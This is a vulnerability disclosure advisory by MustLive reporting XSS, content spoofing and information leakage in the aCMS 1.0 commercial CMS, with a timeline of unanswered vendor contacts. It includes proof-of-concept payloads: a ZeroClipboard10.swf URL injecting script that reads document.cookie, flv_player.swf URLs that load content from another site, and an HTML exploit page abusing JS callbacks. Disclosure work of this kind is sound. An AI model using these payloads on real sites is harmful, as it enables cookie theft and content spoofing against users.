Hello 3APA3A!
These are Cross-Site Scripting, Content Spoofing and Information Leakage vulnerabilities in aCMS. This is commercial CMS. There are multiple vulnerabilities in aCMS and it's the first part of them.
Vulnerable are aCMS 1.0 and previous versions.
Almacor
http://almacor.ru
Cross-Site Scripting (WASC-08):
For ZeroClipboard10.swf XSS via id parameter and XSS via copying payload into clipboard are possible.
http://site/assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
Content Spoofing (WASC-12):
Swf-file accepts arbitrary addresses in parameter flvToPlay and startImage, which allows to spoof content of flash - i.e. by setting addresses of video and/or image files from other site.
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml
Swf-file accepts arbitrary addresses in parameter flvToPlay, which allows to spoof content of flash - i.e. by setting address of playlist file from other site (parameters thumbnail and url in xml-file accept arbitrary addresses).
File 1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<playlist>
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>
Cross-Site Scripting (WASC-08):
If at the site at page with flv_player.swf (with parameter jsCallback=true, or if there is possibility to set this parameter for flv_player.swf) there is possibility to include JS code with function flvStart() and/or flvEnd() (via HTML Injection), then it's possible to conduct XSS attack. I.e. JS-callbacks can be used for XSS attack.
Example of exploit:
<html>
<body>
<script>
function flvStart() {
alert('XSS');
}
function flvEnd() {
alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>
Information Leakage (WASC-13):
At error 404 page there are Source Code Disclosure, Full Path Disclosure and showing list of the files and other information.
2013.03.04 - informed developers about part of the vulnerabilities.
2013.04.03 - informed developers about another part of the vulnerabilities.
2013.04.05 - announced at my site.
2013.04.07 - informed developers about another part of the vulnerabilities.
2013.05.25 - informed developers about another part of the vulnerabilities. In all cases the developers just ignored all messages via different e-mails and contact form.
2013.05.25 - disclosed at my site (http://websecurity.com.ua/6423/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua